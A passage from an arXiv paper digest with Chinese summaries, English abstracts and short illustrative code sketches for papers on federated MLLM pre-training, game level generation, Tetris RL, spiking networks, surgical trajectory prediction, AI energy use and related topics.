Abstract:The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.
[AI-155] Multiverse: Language-Conditioned Multi-Game Level Blending via Shared Representation
【速读】:该论文旨在解决多游戏场景下文本驱动的关卡生成问题,即如何在不同游戏领域中实现基于自然语言描述的结构化关卡生成,并支持跨游戏关卡的可控融合。传统方法通常局限于单一游戏域,难以捕捉跨游戏间的结构关联。其解决方案的关键在于提出Multiverse模型,通过构建一个共享的潜在空间(shared latent space)来对齐文本指令与关卡结构,并采用基于阈值的多正例对比监督机制(threshold-based multi-positive contrastive supervision),将语义相关的跨游戏关卡进行关联建模。这一表示学习机制使得语言能够指导在混合不同游戏内容时保留特定结构特征,从而实现通过潜在空间插值和组合式文本提示进行可控的零样本关卡生成与融合。
链接: https://arxiv.org/abs/2603.26782
作者: In-Chang Baek,Jiyun Jung,Sung-Hyun Kim,Geum-Hwan Hwang,Kyung-Joong Kim
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 8 pages, 5 figures, 4 tables
Abstract:Text-to-level generation aims to translate natural language descriptions into structured game levels, enabling intuitive control over procedural content generation. While prior text-to-level generators are typically limited to a single game domain, extending language-conditioned generation to multiple games requires learning representations that capture structural relationships across domains. We propose Multiverse, a language-conditioned multi-game level generator that enables cross-game level blending through textual specifications. The model learns a shared latent space aligning textual instructions and level structures, while a threshold-based multi-positive contrastive supervision links semantically related levels across games. This representation allows language to guide which structural characteristics should be preserved when combining content from different games, enabling controllable blending through latent interpolation and zero-shot generation from compositional textual prompts. Experiments show that the learned representation supports controllable cross-game level blending and significantly improves blending quality within the same game genre, while providing a unified representation for language-conditioned multi-game content generation.
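Threshold-based multi-positive contrastive supervision can be sketched as an InfoNCE-style loss averaged over all positives selected by a label-similarity threshold; the inputs below are illustrative, not the paper's exact objective:

```python
import math

def multi_positive_nce(sims, sim_labels, tau, threshold):
    # sims: embedding similarity of the anchor to each candidate level;
    # sim_labels: annotation-level similarity used to pick positives.
    # Any candidate whose label similarity >= threshold counts as a
    # positive, linking semantically related levels across games.
    pos = [i for i, s in enumerate(sim_labels) if s >= threshold]
    exps = [math.exp(s / tau) for s in sims]
    denom = sum(exps)
    # Average the InfoNCE term over all positives of the anchor.
    return -sum(math.log(exps[i] / denom) for i in pos) / len(pos)
```

Lowering the threshold admits more cross-game positives per anchor, which is how the shared latent space gets pulled together across domains.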
[AI-156] TED: Training-Free Experience Distillation for Multimodal Reasoning
【速读】:该论文旨在解决传统知识蒸馏(Knowledge Distillation)方法在资源受限环境中应用受限的问题,即其依赖大量训练数据和重复的参数更新,导致计算成本高、效率低。解决方案的关键在于提出一种无需训练(training-free)、基于上下文的经验蒸馏框架TED(Training-free Experience Distillation),将知识迁移的目标从模型参数转移到学生模型提示(prompt)中注入的“情境经验”(in-context experience)。具体而言,教师模型通过比较学生的多条推理轨迹与自身推理路径及标准答案,提取并持续优化通用的推理经验;同时引入经验压缩机制,通过使用统计追踪选择性合并、重写或删除低效经验,有效控制经验增长和噪声累积。实验表明,在仅用100个样本的情况下,TED显著提升了Qwen3-VL-8B在MathVision和VisualPuzzles上的性能,且训练成本降低5倍以上,实现了高效、低成本的知识迁移。
链接: https://arxiv.org/abs/2603.26778
作者: Shuozhi Yuan,Jinqing Wang,Zihao Liu,Miaomiao Yuan,Haoran Peng,Jin Zhao,Bingwen Wang,Haoyi Wang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 13 pages,4 figures
Abstract:Knowledge distillation is typically realized by transferring a teacher model’s knowledge into a student’s parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student’s prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.
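TED 的经验压缩机制(基于使用统计选择性保留经验,以抑制经验无界增长与噪声累积)可以用如下草图理解。其中效用的平滑方式、阈值与字段命名均为假设;论文中还包含由教师模型执行的合并与重写步骤,此处省略:

```python
from dataclasses import dataclass

@dataclass
class Experience:
    text: str
    uses: int = 0   # 该经验被注入提示的次数
    hits: int = 0   # 注入后学生答对的次数

    @property
    def utility(self) -> float:
        # Laplace 平滑,避免刚加入、尚未使用的经验被立即淘汰
        return (self.hits + 1) / (self.uses + 2)

def compress(pool, max_size=8, min_utility=0.3):
    """基于使用统计的经验池压缩(示意性实现)。

    保留效用不低于 min_utility 的经验,按效用降序截断至 max_size。
    """
    kept = [e for e in pool if e.utility >= min_utility]
    kept.sort(key=lambda e: e.utility, reverse=True)
    return kept[:max_size]
```

这样经验池的规模与质量都受控:低效经验被剔除,提示长度不会随训练样本数无界增长。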
[AI-157] Bitboard version of Tetris AI
【速读】:该论文旨在解决现有Tetris实现中模拟速度低、状态评估不优以及训练范式效率不足的问题,从而限制了其在大规模强化学习(Reinforcement Learning, RL)研究中的应用。解决方案的关键在于:首先,采用位板(bitboard)优化重构游戏棋盘与方块表示,利用位运算加速核心操作(如碰撞检测、消行和Dellacherie-Thiery特征提取),相较OpenAI Gym-Tetris实现提升53倍运行速度;其次,引入基于事后状态(afterstate)的评价网络结构,简化状态价值估计并减少参数量,优于传统动作价值网络;最后,提出一种缓冲区优化的近端策略优化(Proximal Policy Optimization, PPO)算法,在采样与更新效率之间取得平衡,可在3分钟内于10×10网格上获得平均得分3,829,显著提升了训练效率与性能表现。
链接: https://arxiv.org/abs/2603.26765
作者: Xingguo Chen,Pingshou Xiong,Zhenyu Luo,Mengfei Hu,Xinwen Li,Yongzhou Lü,Guang Yang,Chao Li,Shangdong Yang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris’s utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.
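位板表示的核心思路是把棋盘每一行编码为一个整数的低位比特,使碰撞检测与消行退化为按位与 / 或运算。下面是一个示意性的 Python 草图(10 列棋盘,行号自上而下;具体表示方式为假设,并非论文实现):

```python
W = 10
FULL_ROW = (1 << W) - 1  # 一行被填满时的比特模式

def collides(board_rows, piece_rows, top):
    """按位与碰撞检测:方块占据行区间 [top, top+len)。"""
    for i, p in enumerate(piece_rows):
        if board_rows[top + i] & p:
            return True
    return False

def lock_and_clear(board_rows, piece_rows, top):
    """按位或落子,再一次遍历删除满行,顶部补空行。"""
    rows = list(board_rows)
    for i, p in enumerate(piece_rows):
        rows[top + i] |= p
    cleared = [r for r in rows if r != FULL_ROW]
    n = len(rows) - len(cleared)          # 本次消除的行数
    return [0] * n + cleared, n
```

由于每行只是一个整数,碰撞、落子与消行都在字长级别并行完成,这正是位板实现相对逐格数组能获得数量级加速的原因。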
[AI-158] Training-Free Diffusion-Driven Modeling of Pareto Set Evolution for Dynamic Multiobjective Optimization
【速读】:该论文旨在解决动态多目标优化问题(Dynamic Multiobjective Optimization Problems, DMOPs)中因目标函数随时间变化导致的帕累托最优解集(Pareto Optimal Solution, POS)漂移难题,尤其是在有限响应时间内难以同时保持收敛性和多样性的问题。现有基于预测的动态多目标进化算法(DMOEAs)通常依赖于训练成本较高的学习模型,或采用单步种群映射策略,忽略了POS演化的渐进特性。论文提出DD-DMOEA,其核心创新在于设计了一种无需训练的基于扩散机制的动态响应方法:将前一环境获得的POS视为“噪声”样本集,通过解析构建的多步去噪过程引导其向当前POS演化;同时引入基于膝点的辅助策略确定新环境中的目标区域,并推导显式的概率密度公式实现无需神经网络训练的去噪更新;此外,为降低膝点预测误差带来的误导风险,进一步设计了不确定性感知机制,根据历史预测偏差自适应调整引导强度。该方案在CEC2018动态基准测试中展现出优于或相当的收敛性与多样性性能,且响应速度更快。
链接: https://arxiv.org/abs/2603.26749
作者: Jian Guan,Huolong Wu,Zhenzhong Wang,Gary G. Yen,Min Jiang
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注:
Abstract:Dynamic multiobjective optimization problems (DMOPs) feature time-varying objectives, which cause the Pareto optimal solution (POS) set to drift over time and make it difficult to maintain both convergence and diversity under limited response time. Many existing prediction-based dynamic multiobjective evolutionary algorithms (DMOEAs) either depend on learned models with nontrivial training cost or employ one-step population mapping, which may overlook the gradual nature of POS evolution. This paper proposes DD-DMOEA, a training-free diffusion-based dynamic response mechanism for DMOPs. The key idea is to treat the POS obtained in the previous environment as a “noisy” sample set and to guide its evolution toward the current POS through an analytically constructed multi-step denoising process. A knee-point-based auxiliary strategy is used to specify the target region in the new environment, and an explicit probability-density formulation is derived to compute the denoising update without neural training. To reduce the risk of misleading guidance caused by knee-point prediction errors, an uncertainty-aware scheme adaptively adjusts the guidance strength according to the historical prediction deviation. Experiments on the CEC2018 dynamic multiobjective benchmarks show that DD-DMOEA achieves competitive or better convergence-diversity performance and provides faster dynamic response than several state-of-the-art DMOEAs.
[AI-159] LARD 2.0: Enhanced Datasets and Benchmarking for Autonomous Landing Systems
【速读】:该论文旨在解决自主着陆系统开发中因监督学习(Supervised Learning)模型训练数据集局限性而导致的对象检测性能瓶颈问题。其关键解决方案在于:首先,通过引入BingMap航空影像和飞行模拟器等新数据源,显著提升现有数据集生成工具LARD的数据多样性;其次,细化操作设计域(Operational Design Domain, ODD),改善不现实的着陆场景并扩展至多跑道机场环境;最后,构建针对复杂多实例场景下目标检测子任务的评估框架,并提供开源基准模型以量化AI模型性能表现。
链接: https://arxiv.org/abs/2603.26748
作者: Yassine Bougacha,Geoffrey Delhomme,Mélanie Ducoffe,Augustin Fuchs,Jean-Brice Ginestet(DGA),Jacques Girard,Sofiane Kraiem,Franck Mamalet,Vincent Mussot,Claire Pagetti,Thierry Sammour
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper addresses key challenges in the development of autonomous landing systems, focusing on dataset limitations for supervised training of Machine Learning (ML) models for object detection. Our main contributions include: (1) Enhancing dataset diversity, by advocating for the inclusion of new sources such as BingMap aerial images and Flight Simulator, to widen the generation scope of an existing dataset generator used to produce the dataset LARD; (2) Refining the Operational Design Domain (ODD), addressing issues like unrealistic landing scenarios and expanding coverage to multi-runway airports; (3) Benchmarking ML models for autonomous landing systems, introducing a framework for evaluating object detection subtask in a complex multi-instances setting, and providing associated open-source models as a baseline for AI models’ performance.
[AI-160] Capability Safety as Datalog: A Foundational Equivalence
【速读】:该论文旨在解决能力超图(capability hypergraph)框架在实际应用中的两个结构性限制问题:一是缺乏高效的增量维护机制,二是审计表面包含关系缺少决策过程。其解决方案的关键在于证明能力安全(capability safety)可精确表示为命题Datalog求值(Datalogprop),即一阶逻辑中单元、无函数符号且无变量的片段;这一等价性使得原本在原生表述中无法获得的算法和结构结果得以迁移,从而实现了对能力超图的高效处理与形式化验证。
链接: https://arxiv.org/abs/2603.26725
作者: Cosimo Spera
机构: 未知
类目: Logic in Computer Science (cs.LO); Artificial Intelligence (cs.AI)
备注:
Abstract:We prove that capability safety admits an exact representation as propositional Datalog evaluation (Datalogprop: the monadic, ground, function-free fragment of first-order logic), enabling the transfer of algorithmic and structural results unavailable in the native formulation. This addresses two structural limitations of the capability hypergraph framework of Spera [2026]: the absence of efficient incremental maintenance, and the absence of a decision procedure for audit surface containment. The equivalence is tight: capability hypergraphs correspond to exactly this fragment, no more.
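命题 Datalog(无变量、无函数符号)的自底向上求值就是一个单调不动点迭代:可导出原子集合只增不减且有限,因此必然终止。能力安全查询即可表述为这类规则下的可达性问题。以下代码与示例规则均为示意性假设,并非论文内容:

```python
def datalog_fixpoint(facts, rules):
    """命题(基)Datalog 的朴素自底向上求值。

    facts : 原子(字符串)集合
    rules : (head, body) 列表,body 为原子元组;
            当 body 中所有原子均已导出时,导出 head。
    """
    derived = set(facts)
    changed = True
    while changed:
        changed = False
        for head, body in rules:
            if head not in derived and all(a in derived for a in body):
                derived.add(head)
                changed = True
    return derived
```

例如把"持有令牌且已获委托则可写"编码为规则后,审计问题就变成判断某原子是否落在不动点之内。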
[AI-161] Brain-inspired AI for Edge Intelligence: a systematic review
【速读】:该论文旨在解决脉冲神经网络(Spiking Neural Networks, SNNs)在边缘智能部署中面临的“部署悖论”问题,即理论上具有的能耗优势常因异步事件驱动特性难以高效映射到传统冯·诺依曼架构硬件而被抵消。其解决方案的关键在于采用系统级软硬件协同设计视角,聚焦于从量化方法到混合架构等“最后一公里”技术,推动生物合理性向硅基实现的转化;特别强调通过破解训练复杂性(直接学习与转换学习的权衡)、突破状态感知神经元更新的“内存墙”瓶颈,以及填补类脑编译工具链的软件缺口,最终提出构建标准化类脑操作系统(Neuromorphic OS)以弥合同步-异步不匹配,从而实现能源自足的绿色认知基础架构。
链接: https://arxiv.org/abs/2603.26722
作者: Yingchao Cheng,Meijia Wang,Zhifeng Hao,Rajkumar Buyya
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Hardware Architecture (cs.AR); Operating Systems (cs.OS)
备注:
Abstract:While Spiking Neural Networks (SNNs) promise to circumvent the severe Size, Weight, and Power (SWaP) constraints of edge intelligence, the field currently faces a “Deployment Paradox” where theoretical energy gains are frequently negated by the inefficiencies of mapping asynchronous, event-driven dynamics onto traditional von Neumann substrates. Transcending the reductionism of algorithm-only reviews, this survey adopts a rigorous system-level hardware-software co-design perspective to examine the 2020-2025 trajectory, specifically targeting the “last mile” technologies - from quantization methodologies to hybrid architectures - that translate biological plausibility into silicon reality. We critically dissect the interplay between training complexity (the dichotomy of direct learning vs. conversion), the “memory wall” bottlenecking stateful neuronal updates, and the critical software gap in neuromorphic compilation toolchains. Finally, we envision a roadmap to reconcile the fundamental “Sync-Async Mismatch,” proposing the development of a standardized Neuromorphic OS as the foundational layer for realizing a ubiquitous, energy-autonomous Green Cognitive Substrate.
[AI-162] SutureAgent: Learning Surgical Trajectories via Goal-conditioned Offline RL in Pixel Space
【速读】:该论文旨在解决机器人辅助缝合中从内窥镜视频直接预测手术缝合针轨迹的问题,现有方法因忽略相邻运动步骤间的序列依赖性以及稀疏的路径点标注导致监督信号不足,难以有效学习真实物理可行的针尖运动。其解决方案的关键在于将针轨迹预测建模为像素空间中的序贯决策问题,将针尖视为逐步移动的智能体,并采用基于立方样条插值的稀疏标注到密集奖励信号转换机制,结合目标条件化的离线强化学习框架(SutureAgent),通过观察编码器捕捉局部空间特征与长程时间动态,以离散方向和连续幅度组合的动作进行自回归预测,同时引入保守Q学习与行为克隆正则化实现稳定策略优化,从而显著提升轨迹预测精度。
链接: https://arxiv.org/abs/2603.26720
作者: Huanrong Liu,Chunlin Tian,Tongyu Jia,Tailai Zhou,Qin Liu,Yu Gao,Yutong Ban,Yun Gu,Guy Rosman,Xin Ma,Qingbiao Li
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Predicting surgical needle trajectories from endoscopic video is critical for robot-assisted suturing, enabling anticipatory planning, real-time guidance, and safer motion execution. Existing methods that directly learn motion distributions from visual observations tend to overlook the sequential dependency among adjacent motion steps. Moreover, sparse waypoint annotations often fail to provide sufficient supervision, further increasing the difficulty of supervised or imitation learning methods. To address these challenges, we formulate image-based needle trajectory prediction as a sequential decision-making problem, in which the needle tip is treated as an agent that moves step by step in pixel space. This formulation naturally captures the continuity of needle motion and enables the explicit modeling of physically plausible pixel-wise state transitions over time. From this perspective, we propose SutureAgent, a goal-conditioned offline reinforcement learning framework that leverages sparse annotations to dense reward signals via cubic spline interpolation, encouraging the policy to exploit limited expert guidance while exploring plausible future motion paths. SutureAgent encodes variable-length clips using an observation encoder to capture both local spatial cues and long-range temporal dynamics, and autoregressively predicts future waypoints through actions composed of discrete directions and continuous magnitudes. To enable stable offline policy optimization from expert demonstrations, we adopt Conservative Q-Learning with Behavioral Cloning regularization. Experiments on a new kidney wound suturing dataset containing 1,158 trajectories from 50 patients show that SutureAgent reduces Average Displacement Error by 58.6% compared with the strongest baseline, demonstrating the effectiveness of modeling needle trajectory prediction as pixel-level sequential action learning.
[AI-163] On the Carbon Footprint of Economic Research in the Age of Generative AI
【速读】:该论文旨在解决当前Green AI研究中忽视生成式AI(Generative AI)在科研工作流中实际应用环境的问题,即现有评估多聚焦于模型训练阶段的碳足迹,而未充分考量GenAI作为工具嵌入下游计算任务时的整体环境影响。其解决方案的关键在于将分析单位从模型扩展至工作流,并将提示词(prompt)视为决策策略(decision policy),通过设计具有操作约束和决策规则的提示词来控制执行内容与迭代终止条件,从而在保持输出质量不变的前提下显著降低碳排放。实验表明,仅注入通用绿色语言提示无效,而结构化提示可实现稳定且大幅度的碳足迹削减,凸显了“人在回路”治理机制在协调GenAI生产力与环境效率方面的重要作用。
链接: https://arxiv.org/abs/2603.26712
作者: Andres Alonso-Robisco,Carlos Esparcia,Francisco Jareño
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI); Computers and Society (cs.CY); General Economics (econ.GN)
备注:
Abstract:Generative artificial intelligence (AI) is increasingly used to write and refactor research code, expanding computational workflows. At the same time, Green AI research has largely measured the footprint of models rather than the downstream workflows in which GenAI is a tool. We shift the unit of analysis from models to workflows and treat prompts as decision policies that allocate discretion between researcher and system, governing what is executed and when iteration stops. We contribute in two ways. First, we map the recent Green AI literature into seven themes: training footprint is the largest cluster, while inference efficiency and system level optimisation are growing rapidly, alongside measurement protocols, green algorithms, governance, and security and efficiency trade-offs. Second, we benchmark a modern economic survey workflow, an LDA-based literature mapping implemented with GenAI assisted coding and executed in a fixed cloud notebook, measuring runtime and estimated CO2e with CodeCarbon. Injecting generic green language into prompts has no reliable effect, whereas operational constraints and decision rule prompts deliver large and stable footprint reductions while preserving decision equivalent topic outputs. The results identify human in the loop governance as a practical lever to align GenAI productivity with environmental efficiency.
[AI-164] Physicochemical-Neural Fusion for Semi-Closed-Circuit Respiratory Autonomy in Extreme Environments
【速读】:该论文旨在解决消防员在结构火灾中因呼吸系统供氧受限和气体管理不善而导致的生存时间短、安全风险高的问题。解决方案的关键在于提出了一种基于AI控制的半闭式生命支持系统(Life Support System),其核心创新包括:1)构建了包含热化学一致性、化学计量容量限制、吸附等温线及氧气管理约束的物理化学基础模型;2)设计了一种融合三类传感器信息(外部环境、内部气压与生物指标)的AI控制架构,采用滚动时域模型预测控制(MPC)结合学习型代谢模型和强化学习(RL)策略顾问,并通过控制屏障函数(Control-Barrier Function)安全滤波器确保所有执行器命令的安全性;3)建立仅依赖结构消防场景中可行传感器的18状态、3控制非线性状态空间模型,实现未知任务时长与体能消耗下的最优资源调度。仿真结果表明,该方案相较传统PID控制器可提升18–34%续航能力,同时维持更严格的生理与防火安全边界。
链接: https://arxiv.org/abs/2603.26697
作者: Phillip Kingston,Nicholas Johnston
机构: 未知
类目: Systems and Control (eess.SY); Artificial Intelligence (cs.AI)
备注: 46 pages, 2 figures
Abstract:This paper introduces Galactic Bioware’s Life Support System, a semi-closed-circuit breathing apparatus designed for integration into a positive-pressure firefighting suit and governed by an AI control system. The breathing loop incorporates a soda lime CO2 scrubber, a silica gel dehumidifier, and pure O2 replenishment with finite consumables. One-way exhaust valves maintain positive pressure while creating a semi-closed system in which outward venting gradually depletes the gas inventory. Part I develops the physicochemical foundations from first principles, including state-consistent thermochemistry, stoichiometric capacity limits, adsorption isotherms, and oxygen-management constraints arising from both fire safety and toxicity. Part II introduces an AI control architecture that fuses three sensor tiers, external environmental sensing, internal suit atmosphere sensing (with triple-redundant O2 cells and median voting), and firefighter biometrics. The controller combines receding-horizon model-predictive control (MPC) with a learned metabolic model and a reinforcement learning (RL) policy advisor, with all candidate actuator commands passing through a final control-barrier-function safety filter before reaching the hardware. This architecture is intended to optimize performance under unknown mission duration and exertion profiles. In this paper we introduce an 18-state, 3-control nonlinear state-space formulation using only sensors viable in structural firefighting, with triple-redundant O2 sensing and median voting. Finally, we introduce an MPC framework with a dynamic resource scarcity multiplier, an RL policy advisor for warm-starting, and a final control-barrier-function safety filter through which all actuator commands must pass, demonstrating 18-34% endurance improvement in simulation over PID baselines while maintaining tighter physiological and fire-safety margins.
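摘要中提到的三冗余 O2 传感器中值投票,可以用如下最小草图示意:排序后取中位数,单个卡死或漂移的传感器无法把结果拉出两只正常传感器的读数范围。

```python
def median_vote(readings):
    """对三冗余传感器读数做容错中值投票。

    三只 O2 电池中任何一只失效(卡死或漂移),
    中位数仍落在另外两只正常读数之间。
    """
    a, b, c = sorted(readings)
    return b
```

这是一种经典的单故障屏蔽手段:无需判断哪只传感器失效,投票本身即完成屏蔽。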
[AI-165] Learning Energy-Efficient Air–Ground Actuation for Hybrid Robots on Stair-Like Terrain
【速读】:该论文旨在解决混合型空地机器人(hybrid aerial–ground robot)在面对台阶类地形时的能量效率问题:单纯依赖轮式驱动易因地形突变而失效,而纯飞行模式则因小高度提升导致能耗过高。解决方案的关键在于提出一种能量感知的强化学习框架,通过训练单一连续策略(continuous policy)协同控制推进器、车轮与倾角伺服机构,无需预设空中或地面模式;同时利用硬件校准的推力/功耗模型,在奖励函数中直接惩罚真实电能消耗,从而引导策略自发发现“推力辅助行驶”(thrust-assisted driving)这一高效混合运动模式,最终在仿真和硬件平台上均显著降低能耗。
链接: https://arxiv.org/abs/2603.26687
作者: Jiaxing Li,Wen Tian,Xinhang Xu,Junbin Yuan,Sebastian Scherer,Muqing Cao
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Hybrid aerial–ground robots offer both traversability and endurance, but stair-like discontinuities create a trade-off: wheels alone often stall at edges, while flight is energy-hungry for small height gains. We propose an energy-aware reinforcement learning framework that trains a single continuous policy to coordinate propellers, wheels, and tilt servos without predefined aerial and ground modes. We train policies from proprioception and a local height scan in Isaac Lab with parallel environments, using hardware-calibrated thrust/power models so the reward penalizes true electrical energy. The learned policy discovers thrust-assisted driving that blends aerial thrust and ground traction. In simulation it achieves about 4 times lower energy than propeller-only control. We transfer the policy to a DoubleBee prototype on an 8 cm gap-climbing task; it achieves 38% lower average power than a rule-based decoupled controller. These results show that efficient hybrid actuation can emerge from learning and deploy on hardware.
[AI-166] Power Couple? AI Growth and Renewable Energy Investment
【速读】:该论文试图解决的问题是:生成式 AI (Generative AI) 的快速发展是否会推动可再生能源投资以实现碳减排,还是反而会因对电力需求的激增而固化化石能源依赖,即所谓“碳锁定”(carbon lock-in)问题。解决方案的关键在于识别不同规模收益(scaling regimes)和市场激励下,AI发展与可再生能源投资之间的均衡互动机制:当AI能力提升具有超模性(supermodular)且性能提升接近线性时,开发者倾向于追求前沿规模,即使边际电力来自化石能源,此时可再生能源主要缓解算力约束而非直接替代化石发电,形成“适应陷阱”(adaptation trap);反之,若AI面临边际收益递减且能效较低,则能源成本将约束能力选择,此时可再生能源既能支撑AI能力扩展又能实现边际计算的脱碳,形成“适应路径”(adaptation pathway),并可能导向碳中和均衡。因此,有效政策必须确保清洁容量在边际上持续具有约束力,以使脱碳成为均衡结果。
链接: https://arxiv.org/abs/2603.26678
作者: Luyi Gui,Tinglong Dai
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Theoretical Economics (econ.TH)
备注: 32 pages, 5 figures, 11-page appendix
Abstract:AI and renewable energy are increasingly framed as a “power couple” – the idea that surging AI electricity demand will accelerate clean-energy investment – yet concerns persist that AI will instead entrench fossil-fuel carbon lock-in. We reconcile these views by modeling the equilibrium interaction between AI growth and renewable investment. In a parsimonious game, a policymaker invests in renewable capacity available to AI and an AI developer chooses capability; the equilibrium depends on scaling regimes and market incentives. When the market payoff to capability is supermodular and performance gains are near-linear in compute, developers push toward frontier scale even when the marginal megawatt-hour is fossil-based. In this regime, renewable expansion can primarily relax scaling constraints rather than displace fossil generation one-for-one, weakening incentives to build enough clean capacity and reinforcing fossil dependence. This yields an “adaptation trap”: as climate damages rise, the value of AI-enabled adaptation increases, which strengthens incentives to enable frontier scaling while tolerating residual fossil use. When AI faces diminishing returns and lower scaling efficiency, energy costs discipline capability choices; renewable investment then both enables capability and decarbonizes marginal compute, generating an “adaptation pathway” in which climate stress strengthens incentives for clean-capacity expansion and can support a carbon-free equilibrium. A calibrated case study illustrates these mechanisms using observed magnitudes for investment, capability, and energy use. Decarbonizing AI is an equilibrium outcome: effective policy must keep clean capacity binding at the margin as compute expands.
[AI-167] Can AI be a Teaching Partner? Evaluating ChatGPT, Gemini and DeepSeek across Three Teaching Strategies
【速读】:该论文旨在解决当前关于大型语言模型(Large Language Models, LLMs)在教育场景中是否具备有效教学能力的实证证据不足的问题。其解决方案的关键在于设计并实施一个系统化的评估协议,聚焦于三种核心教学策略:示例(Examples)、解释与类比(Explanations and Analogies)以及苏格拉底式提问法(Socratic Method),并通过六名人类评审员对ChatGPT、DeepSeek和Gemini三款主流LLM作为教学代理的表现进行量化比较,从而揭示不同模型在 pedagogical skill 上的差异及其对提示(prompt)敏感性的表现。
链接: https://arxiv.org/abs/2603.26673
作者: Talita de Paula Cypriano de Souza,Shruti Mehta,Matheus Arataque Uema,Luciano Bernardes de Paula,Seiji Isotani
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:There are growing promises that Large Language Models (LLMs) can support students’ learning by providing explanations, feedback, and guidance. However, despite their rapid adoption and widespread attention, there is still limited empirical evidence regarding the pedagogical skills of LLMs. This article presents a comparative study of popular LLMs, namely, ChatGPT, DeepSeek, and Gemini, acting as teaching agents. An evaluation protocol was developed, focusing on three pedagogical strategies: Examples, Explanations and Analogies, and the Socratic Method. Six human judges conducted the evaluations in the context of teaching the C programming language to beginners. The results indicate that LLM models exhibited similar interaction patterns in the pedagogical strategies of Examples and Explanations and Analogies. In contrast, for the Socratic Method, the models showed greater sensitivity to the pedagogical strategy and the initial prompt. Overall, ChatGPT and Gemini received higher scores, whereas DeepSeek obtained lower scores across the criteria, indicating differences in pedagogical performance across models.
[AI-168] Learning unified control of internal spin squeezing in atomic qudits for magnetometry
【速读】:该论文旨在解决多能级原子在低磁场条件下,由于非线性塞曼(Nonlinear Zeeman, NLZ)效应导致的量子态制备与测量精度受限的问题。NLZ效应虽可作为生成自旋压缩态(spin-squeezed states)的资源,但其随时间演化导致的压缩轴漂移和有效非线性作用变化,会破坏固定读出方式下的测量相关正交分量,从而限制了可实现的计量增益。解决方案的关键在于引入物理信息强化学习(physics-informed reinforcement learning),通过仅利用实验可测的低阶自旋矩(low-order spin moments)训练智能体,在$ f=21/2 $能级结构中发现统一的控制策略,该策略不仅能快速制备强压缩的内部量子态,还能在持续存在的NLZ演化下稳定超过4 dB的固定轴自旋压缩;结合态制备开销后,单原子磁灵敏度达13.9 pT/√Hz,相较标准量子极限提升约3 dB,证明了将不可避免的内在非线性动力学转化为可操作的计量优势是可行的。
链接: https://arxiv.org/abs/2603.28421
作者: C. Z. Cao,J. Z. Han,M. Xiong,M. Deng,L. Wang,X. Lv,M. Xue
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: (6.5+2.5+2) pages, 4 figures
